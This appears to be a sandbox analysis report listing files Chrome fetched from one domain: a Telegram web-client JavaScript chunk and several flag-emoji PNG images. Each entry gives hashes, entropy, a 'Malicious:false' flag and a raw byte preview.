                                  Preview:.PNG........IHDR.....................PLTEGpL..+.Z*L.lh.....b.,___Z42b..h..q..i..i..i..j..a..m.!...\..h..V..j..k..d.....9.Zb.}...g.....m.".u.d`R......a.}b.ym.p.e]]]\\\```aaa,xN_`bFA,}f..l..i.g..d&&&....3D.........###..D........A!!!....2C%.a..*..!#._.....H..J..)..F..>..Q.....?..S...%%%.2C..U..%.!0..O..,.....$..Z........@../."3..L....&7..?..\!.]&.b..N..<..W..(.!...X..&..".):..-.....#p.#.!0.i0.!0.]*.Z).{9...*(%....,=..$.......b....$..........#y.%..#.t6CCD778....0A1.h....!k...."..%...PPP..!..i`..>.o.. ........ ..)].{t.......!h..0/.U.sY.|..G....v...!..=Q.xH.t@.]@.i.(5....'2...[[[.l.....,:.r5....#E....*8P.w..'...-.]$.U5.f.....$l\...$.....g...:.a.#/C.o...../-.c...SC..".....P..9..(.^.....:....6...f.O_O..c0..K.......`}}~.S....*.......Ajjj.'3.{.?.2{.)..A6....%wJ.I..y2..(...JA$=6#.O;trn.+.><.`.?G.....4tRNS.c~..c..2 .8.og...|P.?...b.....~T.R$.a....ss...q.c".....IDATx...{|.e..q=.T.9.(+.9^...s:L..D..A"..MIP#+E@e..k.m.fZ.m%1m..$hj]..5.Z*E{.Hk/.B.@.."W.Ee..yf.4&M....#.$x.....K..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (10642)
                                  Category:downloaded
                                  Size (bytes):10696
                                  Entropy (8bit):5.225077614856383
                                  Encrypted:false
                                  SSDEEP:192:HnCUz1vNz+6YWQ5PMCUNLTF63vy3fEBzXNqYyx7as/m49YA/UovoDc+Eub/:HnN1vNzHYWTavRXoYyxeqm4aAzAD/Eu7
                                  MD5:EA8D5208DADA45E8D0844877A7C93DB6
                                  SHA1:45D98FBE3DAE09A988CCCD836D39016C5100F313
                                  SHA-256:25F447387CEFB643C04E0AA816E21EDF562EBE9B7E3F7B808BDB179154FC17B8
                                  SHA-512:E95F47A6E80CEDFFFD956858247F718DB6DDDF6A9802CA324F384C0E813895A949090CBA5C2CAD59E6A14D14C736D93954596385C99103DE67844A4CD8F99D20
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/8673.1b6dd8d303b0535cc1f8.js
                                  Preview:"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[8673],{8673:(e,t,s)=>{s.r(t),s.d(t,{default:()=>S});var i=s(9822);function r(e,t){return t-Math.floor(t/e)*e}var a=s(9705),n=s(4235),o=s(1481),h=s(7836);function d(e,t,s){var i;return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e;var s=e[Symbol.toPrimitive];if(void 0!==s){var i=s.call(e,"string");if("object"!=typeof i)return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return String(e)}(t))?i:i+"")in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}class c{constructor(e,t,s){this.target=e,this.onUpdate=t,this.channel=s,d(this,"requestStates",new Map),d(this,"requestStatesByCallback",new Map),d(this,"pendingPayloads",[]),d(this,"pendingTransferables",[]),d(this,"postMessagesOnTickEnd",(0,h.Fe)((()=>{const{channel:e}=this,t=this.pendingPayloads,s=this.pendingTransferables;this.pendingPayloads=[],this.pendingTransferabl
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5207
                                  Entropy (8bit):7.939941205004514
                                  Encrypted:false
                                  SSDEEP:96:N1a9UGlU6fBcIbeKNPfk0JCcuaQRpG6B7Q4l6bOS1Ee9:N1a9Uy3CEJC3pnB7/2LD
                                  MD5:65307CEE2FF4BD4DAFBC713536D6AC31
                                  SHA1:FAA0698B4197DA89D2EDB0AF62362F70294C68DD
                                  SHA-256:EF5E65E6C2360CADB59CD89120AD3034E19B77D70DBB8855F7EFFB7C8C8952E4
                                  SHA-512:9A14E0FFABE95B5F285892D2A81B87E91DB999C38E8F972BDD8F8DB2FD11DCD26866D41091A241083E6AB5ECB0A4DFFD623334EB651E939ABD9F3C17B66214C4
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.^`W.....V.....W....V...M?......n."..._...{..n..m.|B....W...{|...X........V..X........T...oqV...tw.RR....."........... .....&..&..%.....%..$..#....."..!..... ........................&.......'.........+..............$...............)..D..........................*.........(............+......m.........v0.....i.../V.S.m1.y.....~..r..{.....a2..%.m..`d.Z^.a..z.qry.o..V0.TY.p..MQ.Yo.NQ.m..X..H6.PSjkL.FK.\....O.uj..@E.EI.;?.A#.R..7<c[Y.7<.BE.6;.5;.59.DH.I..9=.38l[..@..;>.48.16./5./4.)>.-2.04.49.+1.*/.0.BWM.+0XT..).."=.Y..,0.',..)pC..%+k<A.5..,/.#(.%).%*.!&{2'..4.%'..$. %.',.."..!JD..#%..#.. *@v5CE........+c0....y"&.. ...s"$...}..........$r. ...|..i. ...a. p..?0.z.....]..o..d..b..X..R..M..%......VY.ad.]_.Z\.in.eh.LO~f.]...#tRNS.... &4:K\_ccv}~~~.................b.Ub....IDATx....n........77.%.^.v[...}..E.....<B.].)......dY/......b..NE ....V,Y.)..s)5%:"H.T.'....9....s.M.6m.i.M.6m.i.M.....fQ.. ..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5307
                                  Entropy (8bit):7.918994636420094
                                  Encrypted:false
                                  SSDEEP:96:UnBXhV/+sX1/AvkdmX3kpeGf6QPWPp88wjJ78Kz+8y3rXyXZtrJJXcPH:UnDV/RXyZXUIGRGq4KzHy3rgZt7X8H
                                  MD5:8BC3EE67F533AC61E3C330D9E1F9F181
                                  SHA1:6BAC2637B0D352BDF516B76C14E4928AF01D2048
                                  SHA-256:B913B891677FC52EF5DC0F3BABDC6816F2D46555AA01D34681FFFEAC48D0980D
                                  SHA-512:616D38F51C2DC7B934C875614C9D481E8AB1E7C02EEBE1FF6CF03DD03C7ADADE65A0845051E0F0EC1BE7AEA2139DCBA5DECAB1BF9A9CF33264561E312B26D499
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f5.png
                                  Preview:.PNG........IHDR.....................PLTEGpLp.. 7[.1Ul...2Vu...0Sq..Ke..xw.57)Er....0Uj}.p.......!....1\m..<V}y...1Ut..m..`v..2Vt.../Tx..m...,P!8\x...1U.+OD].............................................................................................................................................wy.qs.ln.tuy...|{.cfx...^ak...egs...SW.SW.SV.XZ.RVn...RV.QU.QT.PSm..e...ORi...X[.NQ.SUi~..LO.JNa~..JN.LO.IL[{..HKcz..DH.FI.PS.EHUx..?C.CF_u.Wu..AD.^^.GJ.ADOt..:>.?B.>A.:=Wo.Pp.Hp..<?.59.=@.:=.>AHm.Cm..9=Pk..8<.48.GIBl.Kk..7:.7:@j..=?.<?.58./2Ch.>h.Kf..37.47.36<f..15.25Ad..15.*..03;c..049c...1.8<..26a..-0>`..(,.,0.-09_.5_..#'.,/3].6[.-\.1[..$'.57.*-..#/Y..474X.(X.-W.-V.0T..'+4S.)S.....#')Q."Q.&P.0N.'N.$N..$'*M.#L....!K.+Ix I..G.(Er.F..G.#E{. "....C...!%?i.?x.@..=o#:a.8k.7]....7..4Z.1_..T.(N.......ytRNS...!"48JTUccbdghz~~~~.....................................................................................................!WW....IDATx...{.\W}...=....7...M..@BH......J.V...UB".
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4082
                                  Entropy (8bit):7.789732533377982
                                  Encrypted:false
                                  SSDEEP:96:KEi7rkHBHXZV+a+LVJs62IDJo9hdhf7WOsu:Xi7rWHX3+aOVO3IDJo9p7WDu
                                  MD5:0A48FD684B5222189D6E49ECCC153BCD
                                  SHA1:94B240EF4B26522E8EA8E97A659BE1AD7DC67852
                                  SHA-256:9EAEB57BEBE394337C0109B5F93B150AF46A66EE9CF74A3B38E1E59E710954DB
                                  SHA-512:36A9389EFB14E4B0ECE782CB5E01D248D342730A4DF0562BFEEC7628C8DF4450C2880037DF3D857FBBC43ABC3CF383EFB17E76651A8B6E387AA7BA9EE972AE07
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fa.png
                                  Preview:.PNG........IHDR.....................PLTEGpL$Y7.U2.T0.T1.R/.P*.y..{..y..y..{..{..{..v~.z..rz.mw.fr.`l.\j.Ud.O^.JZ.IY.GW.DT.BR.?O.<L.:J.8G.4D.5D.0@..>.,<.*9.'7.%5.$3. ...,..$..(..>..B..Q..Z..[. ]."_.$a.&b!(e"*h%,i&.k)0m*2p,4r/7t29w4;y6>{8?}:@~;B.<C.=D.5A..Fh.IX.J[.IY.O].Wd.GV.?N.xR..E~oFFGj)/f&-\%*T)+S./:..:..=.3B.5C.5D.=K.FT.P\.\g.eo.mt.hp.bj.\e.U_.KY.AO.AO.?L.=b.DSzDp_BuKG{[Ynohf..K..L..O..N..L..K..I..H..E..E..B..B..>..?..;..:..6..6.4.1.0.-.-.+.).).0.'..$.. .}..y...;"pD..2..2..6.,.8.:@.Rh.7,.U#{H.k@.^8.d<"rD"uF'.M(.Q'.U#.N1.S0._..[3.c4.e4.g6.i8.j9.k9.l0.m[.bx.]..U..U..R..O.U..Z..`..i2;..o<"$YI*Y3!W.-<.'6G.Js%G./?.5Cd2^?7\RMPga@.-..7..9}.;.*Z.?0.d..a+.^(.\&.Z$.X".V!.T .R..P..N..L..J..H..F..E.~B.w>.k8.c4.^1.S-.L(.Y2.X4.Q-.N+.M).sz.px.ov.ry.nv.kr.px.fn.LV.nv.v}.x..^:.\8.Y5.T1.V2.S0.Y..u......tRNS...Ha0...[1................................~~........................................bb.........................................................~~bb..............................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3527
                                  Entropy (8bit):7.866956458166557
                                  Encrypted:false
                                  SSDEEP:96:x6yGCxiSnL81RhNRK6nnYbyhU07hJoPu12eEKCVyl8QM:xpPJLO/HYbX07HhoF/AlXM
                                  MD5:C6022F61E14FE63E08EE88B94C74814B
                                  SHA1:1AE0BF5EA2DC58DC171D83C569989282A50A1BB7
                                  SHA-256:6877247E97B03BE653A9153CC26B5CA09CA726B367781C7F13A9B89AD599B734
                                  SHA-512:DDD85CD664F5F4BC78B79609FA0210E12A3EF0CDF04A822F4E936D355A3E4F2965B604FAEA1824EC1DE0A678D2091FAE03433BF193F5C122960DEF8E9E369DF6
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ef.png
                                  Preview:.PNG........IHDR.....................PLTEGpLsK=.w..tT,)j.!..t.jE-&.tc...lh..r...f.E-]....#.j(...v.!.D,.n.A)t.!.M0i...E-.ot. f...B+H.iu."f...D,.t.C+..dc..w.".C,.se..v.#.G/.sm..BhQ'A0..4..3..3..0..8..7..8..6..2..6..6..3..6..4..7..B..0..4..L../..5..,..U..@..+.....)..]..&..9..8..$..H.`.r.."....j...#...$.@.%...e..;.%...C...&.P....d.".../...?....\.=.$......N...A....&.v@v.s. ..!..!d..._B[.X\.~M.yV.x.a!.M??.sK.p.@D0.kD.k.6K.4K8.i.4J.3J.3J..i.1I .e.2I.1HVw].(E..d).e.(D..c.1G..g..b..F.'C.B$..a.-D..`-.a.._.._<za..^.P)..D..].*A..\..[..L..[.'>$~Z..Y..X.,?..l..W.$;..W..V..U.!8..T.{T..R.)<.!6.~Q..5.}P.wQ.|O.!6..3.{N..2.'8.zM..1.!5..;.wK../.oL.vJ.uI.tH..,.hI.!2.sG."3.%3..+.qE..1..(..+.oD.lB..&..%../.bB..$.i@.f@..%..%..,.Y<..).a;..#..(.Y6.T6|.&.. .L3.O0....K.t...F-.A).>&l....o.....tRNS....."%2376=?JSR_cccehkv|~..................................................................................................................NH!....IDATx..Mo#Y...{.*.$.i.g.3b. ."
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5123
                                  Entropy (8bit):7.909914553695886
                                  Encrypted:false
                                  SSDEEP:96:uGKEKAD2MSvrrl/qilnHmsV5Rq3zn9uzUGXV3XdHf3wKp+SF:uGKERDPmrpCilnHmce3znElRZf3JF
                                  MD5:CCB3727FC395A3036F08DD529CB4E454
                                  SHA1:C18FD097A4F55271D795529D44D3EB01DDF0BF83
                                  SHA-256:D6153205A96FB40578D1A36F7D52B7E0A5D80457F65DB58EB659BD892BCBE96D
                                  SHA-512:AC0B6E7A9B1C59468E2FD7FB4F194BC849F304978098382E1C10133B5D5CF3360E8E5B690FA7F9235B07F72DA77A00C8FE108B6C7FA805B03D9036F6E2992717
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLs#,.ow.=Ef...pyh. .ktj.".r{k.".......$/.iq.IRe......,6q...gn.s|h. f...em.rzf...]f.ksg...pxf...r{_...KT......................................................................................................................................................................................................y...............i.......U...F..........8..-..........%........................{....~........z.s...iv.ry....nt.lu.\i.gpb...gp._j.al.ks.Xd.[g.bj.N\Uy..R_.Xb.[d.GV.KX.U_.NZ.BQ.?O.CRFn..OY.<L.JU.9J.;L.9I.BP.7I.7I.<L.3D.5G.6G.4E.CO.1B.3D.:H.->.1C.5D.<I7c../A.,>./@.,>.2A.,=.*<.2@.(:.#6.<F.*;.&8.-<.$5)W..%6. 3.%5.&6.,9.!3.1<.!2..1.&4.7?!Q.../../..+..-.%3..,.'3..-..*..).J...'.#/..-..&..&..$.."..%."-..(.."| *..'..... ..#y.&r.'...n.#w..g..v..o..e..^..#.......tRNS....+->DN[_bbbllq~.~.................................................................................................................................0:.....IDATx...A..6...|..l9.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4636
                                  Entropy (8bit):7.914394536131557
                                  Encrypted:false
                                  SSDEEP:96:8laXKYDxamRDIGfGDBNl6+SlbTNlclCfswlNs8JjbWoDL:8shDHqRWgpcjbWov
                                  MD5:011B044D1FC504973A154508D7134408
                                  SHA1:2297C0CF7F7C917EC5FFE6FC43EF1443B31B2CEB
                                  SHA-256:4F285B0CA9AA0455C56573B87FFE46230275BD8404C7638DECA3AE9B1ED7F4FB
                                  SHA-512:F979CF17BAB2E3FC88B448310E3FC5427F3705ABCD9CAA7E48D35D3FADE5C0917B8B0FA6C69FEDAEC606CCBDA6BFADB3442054C40298538C70B263193B9BED1D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL*;\k{..)Leu..$Hfw...@hx.."Feu..&J..Ak|.Y^e.)O..7.1_..@br..$G..;.t.QRK.-R..Fiy.. Dhx...B.!Daq...Bl|.L_.dt.."Eaq...Bl|.;Osl|.dt..!DQc..%H..;j{..............................R..R..S..U.....S..K..Q..I..P..I..Z.F....@.B.;.\.:....C.6.`.8.0.D.2./..\.<.....j.5.....[..2..l|....5s....M..rf}.j{..xIfw.rwu.t"bs.Xr.]p.\n.^m.Vl.tjIXj.Oh.Tf.\djNd.Id.Na.E`.[^WH^.?\.GZ{OZeAZ.@W.9W.@St;S.3S.NQN5R..P.AOa1O.5N{+M.)M.)M.)L.(L.(L.(K.(K.'K.'K.5Jm/J|(J.&J.%I.%I."I.(H.$H.#G.%F."F..F.!E.%D~ D.)Cs!C..C. B..B.!A|.A..A..@.,?_.@.!?w.?..>..>..>..<t.=~.<..<z.<..;~.:m.:|.9|.8t.8x.8{.7v.7y.7..6g.6o.6y.5v.5x.3f.4u.4w.3_.3h.3r.3u.2}.2u.0^.1s.1t.1n.0q./s./r./p..Z..h..z..r..o.-p.-n.+T.,l.,n.+a.+t.+l.*l.)M.*k.*l.)j.'V.(i.'r.'i.&L.'e.&[.&c.&h.%f.$m.$`."H.![. l. M..S..C..J..G..?..;A......mtRNS......))48GFS[aabbfmpu~~~~......................................................................................Y...^IDATx...1..D....W5......M@..F..).B..s. NC..$.s..,.....vU..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4644
                                  Entropy (8bit):7.9123396017004035
                                  Encrypted:false
                                  SSDEEP:96:tzFtubwvsyTT9ToatV6mQRSCcslHkhjLEoss7wLUo2rL:V/u8vbZTVtV71slsX8Sv
                                  MD5:990DD632F1EF86AB4861FAF1CF7BE285
                                  SHA1:2E042FDE260ABD268F9FEFB6F8B21526983FCD17
                                  SHA-256:CA405E0798AACE9D063D62737BCC45F18706641EEF4E52B5B88E8EB84AB3302A
                                  SHA-512:18990ABFF9DA26E08675FA73E210F02B540A9613B6DAE444149B58BA4D730136DC9B19C46DE359628F9AAA5F77EF3407C238177222CF31CDA48034B2674D2D1F
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLG$..oiqWL05.c.a9I#=...jjb.b.H.E...b..o....aaa.H..lle..a.a....O.,,,....mmb.bcccg...I.....llbbb.klg......llccc`.`.O....g..cdd.ll...LLL.I.edd.N.].]e.e...................................u..x..f.o....^.j.U...v.[...J.U.C.zy.z..sr.?.xS.kl.|2....t9.kS.ed....e@.\\.h..VR.a+.U-.IH.. .M"......6. ....C(.:7....<.___.4%....//...ZZZ....*).-..+*.&&.''....$$.%%.$$SSS.%#.##...."".$"..!.!!.~...#.y.PPP.... ...OOO......NNN."!..............!......KJJ....... .}..o.....v..l..........DEE....m..e....@??....].....c..Y.....S.~...V.y..<.....000p..i...H.)((*.....$....................................................................=.;:.:5.3!.!...F.E.<<..........TT.FF.aa,.):.<.AA...).).ZZM.M...S.S.......hh.NN.........).(......................66.. 777,.%....2tRNS......'7:AJPccdeedmm~.............................R.......IDATx^..IK.@..ai.t...(."......".d..u...D.^.........?'..!..B.!..B...A..Y..B.a.K.e..D.../lh%........G.I.j.ot.I......J..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6681
                                  Entropy (8bit):7.9322836783494886
                                  Encrypted:false
                                  SSDEEP:96:WprUGhXgw8p0lS2z8NR5c0E1B/9pN8wBdIXoxkrscqKoDKqXIX8tDe+GhpLJqRdg:hogw8p0l27Q/9fio6toGq4ylGhdJqL1W
                                  MD5:45570917787820CCCE57A0F495347520
                                  SHA1:B42EB3D269DABED826191835FEAFDC66B2806625
                                  SHA-256:23F9B956447561F035D72B1E94FFF5D7FE91AC6BC9852BC87F31D6882F02D197
                                  SHA-512:BED77E88751A66034788C636831711733A9FA7DA27CE95354474F86F57D8327653270F05B3FD1B9394EEAD2164E05B420DC24D19E3D97442CE7B7EF8E5984EBE
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.........zzz~~~...www........yyy...}}}................rrr....................{{{......qqq......ttt......{{{.....vvv......www.........ttt......................tttyyy...........................................................................................................................................................................................................................................................................................................z...............................z......dp.........v......r....|||.R_wwweu..HVrrr.=G.>K.AP.AP.@O.=J.?M.G[.BT.=L.7Aiii.;J.8GRg..Ga.3Cbbb.Ji{KnJ^..*;`R|.6MYYYST.DX.cKtCW.CW.AV.:W..!2.)?SSS?S./Y.<Q.f>e-S.7M.LLLo5Z3I~FFF0E{k+QAAA)@w>>>$<t:::!7o555000---)))%%%...........................- ./....tRNS....."%.59=ERSUacedgginz{~~........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4141
                                  Entropy (8bit):7.911476872865669
                                  Encrypted:false
                                  SSDEEP:96:c/pPUsQuQGcfT91MLsb/G9EMlrwXYZGI4Ezmk:Mrjdcf7kTX5wIZGI4kh
                                  MD5:1AE48224BD5C58AA86982F8E632FDF31
                                  SHA1:27FFEF758CD696A95738CB8AE664A9DA4B9E0624
                                  SHA-256:1C2BC0D8512173316C3D69B69C80F22107019B77D285523EAD220E69E4941923
                                  SHA-512:F4179AA8ADAB224FB6CA9C83528EC801F403DCF82CF8E542357F3D0EFEAD6D8D37DCE488BB63D40FD2DF4A9797EE49EE7938E3F645D44BBDAB7ED0032AD3D083
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.cj....bj.......nv....mu....CM.ow....... -.......Za.jr......IIIv......&1.lt....CK.ow....el....qy....ip....jr....rz.SZ....dl....<E....................................................................................................................................................................................................x........f.....{...U.........w..p{.jvA.v.qy...6.n.mu.ir.bl.We.dn).e.]g.dl._h.Wbxxx .^.Yb.]e.P].S_.KX.Xa..U.ES.IV.MX.Q[.>Njjj.KU.?M..K.CO.8H.4E.4D.3D.3D.2B.3C.8F.DO.0B..C.>J.0@..?.2B.->.6D..9.+<.,<[[[.):.5B.+;.'8.0>.&6. 2.$5.#3.'6.!2.*8QQQ..0../....!0..)..9..,."1..-..+..)..)III."/..%..'..*."...&..#..$.....*.. ...???........&............~..333...w.....&&&%%%###""" .........................................................v9.....,tRNS... !17CGSU`ccccjstx~~~~.....................c.m....IDATx...o..}..2...."DQU,9.-..(..:v. -R#/}*.....}/.....>.(P...G.E..N..N.D.....S.EZ".:;3._87,....~...gv..{>...;gG.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4124
                                  Entropy (8bit):7.887080875510568
                                  Encrypted:false
                                  SSDEEP:96:rqaWQ+iiGVLMi4RlMVbWcIyl7ht/OzIztmO2:rn6KMDwydylm4mO2
                                  MD5:F0F002A3968F042993D0C18D25F67819
                                  SHA1:03032FEC7820A2C523E34FA354B05C56ADCA7B4E
                                  SHA-256:56AD2FFB00D52353696162230B41E4B2689A4AEBB2CD6D84A6F04B539C7B8DCE
                                  SHA-512:73911243DAC8C2FF297AC5417686F9F0E9EB8E8C8BE88CEA367B83C97C6CC491E7B8DA7A5DC4A7E27CCE42866ECE3156C8A09695B5A12EB9C830BC7EE4A03DB7
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...H&&o.~.kvR. .yz9" ...|}i.$.6(....htZ.w..0....?.1"v.~d...gs}...<).ht,_N.......4%c.~^...jv...e..R{n.5&.dp.......5&c.~d...gs....8)...b.~^...z.,_O.......................................................................................................................................................\.^.........s...b.........Y.......k.....s......4...Y..c..u...`....S.....S.jv.yZf...co|.B\.y:...]j.mM.J_R.s.Sc.Wd.cB}iaO|o.HZ-...L[D|j.`E0.g.=R3{dx[H=tb.?P.V6.3J.+E+t].3G.)B.vy.+CrQ<.'@.mY.1E.$>.$=.rV.qU.'>.!;.pT.3CeL=.oS jR..9.nR..6..8.!9.%;.lP..6..6. 8.kO. 8.jN.dM..4..4.!7..3aD3.hL..2.gK.iK.fJ..1.cI..0.eI..1.... 3.cG../..,.aE.VE..,.`D..*R=2.[C..*.^C..)..0..,..)..(.]B../..'.\@..&.Z?..&.Y>.X=.W<..%.U;..'.Q8..#v.(.L5.G4~...E/.B.g. o...=*.;(.7'^...2"."......tRNS......'1::JPUVWcdghjlo{~.................................................................................................................................9IDATx...=..G...gv.V....>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3832
                                  Entropy (8bit):7.874579251474878
                                  Encrypted:false
                                  SSDEEP:96:zYsPa1xTcgZgeTDifcckzhHOXt713xNKgGLL8:cQa1VcgZgeCfcDhu9J3ygSI
                                  MD5:4B32879653C41A7987AF3DB216562388
                                  SHA1:D4DA6392FC0DB79B7A8A90BABE7BEE204E4380E2
                                  SHA-256:C25A8861FAC6A81117E7E448288F7EE2ADCF5B0C61B95DB254957BAC38B3E8CC
                                  SHA-512:8F1720CFA040F0DDEDF7C76C5CDBDB549A88A0D7166E13477FBD39E22616A4B700E5E7FDD6B7561D23DEBDB6FFC83680D7F8DBDB8F13D633E63DF7215DE5D997
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLw<;n..k. h..u.!q..u. u.!j..@.w...%vc..0t..u.!_..h..|$'s........w!#p..o..Dthv #l..o..|%(t..p..i..~%(m..p..{$'t. ///u..e..{$'n...................................................................................................................................{........y.....Y....i..s.....o...nrf..]..U..i..L...ps\..g..L..C..;..d..:..P..?..9..Y..9...[_9..@..+..7..5.....6..\..I..._c4..2..>..P..2..0...np@..'..R../..-...JO.JNC..,...IM4......GL*...HM.lm"...FK.QU<.~'..3...EJ.CH.BG.EI.=B...$.~.AF&.|.?DC.v!.{).z.>C.AE..x.<@.5;'.u.?C..v.9>..s..s.=A.6;./4..q.7;..p.39.49&.k..n.:?.16..m.38.59.-2..3.'-.7;!{e.37.*/..f.-1"ta.(-.48.15.%*.',.+/.$).14.."..#.*...1.#(.,/."&....*-.$(..".WI.'*.#&~%(...| #...u. *;7r..k..S...(%<.."..............................................m....+tRNS....$+8>OTUccceekvwz~......................DgA...|IDATx...[.$.]...s...'k.;v.........8XX.W.=/.../..$$.EBX....H.V.1X.!..8.].zO3....Pl........D....fw.....<.F#...x.W<-...O.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5314
                                  Entropy (8bit):7.920120484495195
                                  Encrypted:false
                                  SSDEEP:96:b+EL1HPl0jOoyBc7nTx8bQEUvXmMOi0dEbLlFSootIS:1BHd0j7y7l8ZEGLytR
                                  MD5:67B5EF5CD4D6A894B1C383707CE1F41D
                                  SHA1:807E87C0EECFB9BE3208916783EF5C021F4E386D
                                  SHA-256:F22EC8F87CA22A947415CCF5186F2EF5620D6521F97B83B1056FB60F41858406
                                  SHA-512:E03B91A540797B2616BFB45F66D44A38A103067B8279056CE7469DE6508202C3993DA38DCDA47A3C647E16E0411E470369FE43D958C4364996E4D82DC6C63E48
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLEVEDRD*D*IVI.8.fff.:....fhf....L.....8.MMM.8.ccc...okd.8.l........aaalll.4..=.llleee.9..;.dddRRR.8.jjj.6.bbb.:..<.///kkk]]].4.................................................................................................................................................{{.......qro.q.xx....ll.eej.j|~{.XX.ccY.Yf.f.RR.EF.NNkllD.D^tPfff.;;>z:```.11]]].A?.%%YYY.$$Lg'%{%..!..$.%%%z$.&&#y#UUU.%%<f<"w"_W!.##RRR. t .!!.&&...OOO.r..p.......LLL.j..n.....&&.m.......IHH.......e..k.....h....EEE.%%...CCC.f..c.._.......AAA....c...........X....>>>.`.y##....X..^....:::k%%....[.....P.....Y.666..........W.....V..J.X$$.R.....T.111....O..C.......F##.J..F..@.,,,...)))4$$.C..;.}..&&&%%%.<.###.%%.8.!!!m...4..$$.%%....##.0..##....%%........................................+tRNS..."5CNScccbcfjvx~..~~.....................YdA....FIDATx...i..Wa.....{..$.ed....1...R....a...J...T*.PT*..).T.*r...|.....nR....6X...d[..E.....9...{/l{.Fk.d/...a.5..|...~.{Z3..7n
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65500), with no line terminators
                                  Category:dropped
                                  Size (bytes):600806
                                  Entropy (8bit):5.368119835607673
                                  Encrypted:false
                                  SSDEEP:6144:VkBAibwsEfwd3q+IDUNxmt4B+vb4CXOBCJ5EwjNoznYuNsKZam3Vt:V3i5QGmt4B+vb4C1Bg7s5m3Vt
                                  MD5:038CB1A82CC7845451DCE0EDAF01D2F1
                                  SHA1:63FC6F036A969D4235D7C82057294F8C039401A4
                                  SHA-256:935B399CCC0970176DA62E39FA0B4AACCAA708103103724E23D6BE95F87C97A9
                                  SHA-512:BC3DAA14794848BE0065D7B7A83EEE201ECF812298FB6B58FA4D02666837223A992098458B68E19D9B9631818C5438ED350A01FF6A8ADB9E45B2E667CD93BEB3
                                  Malicious:false
                                  Reputation:low
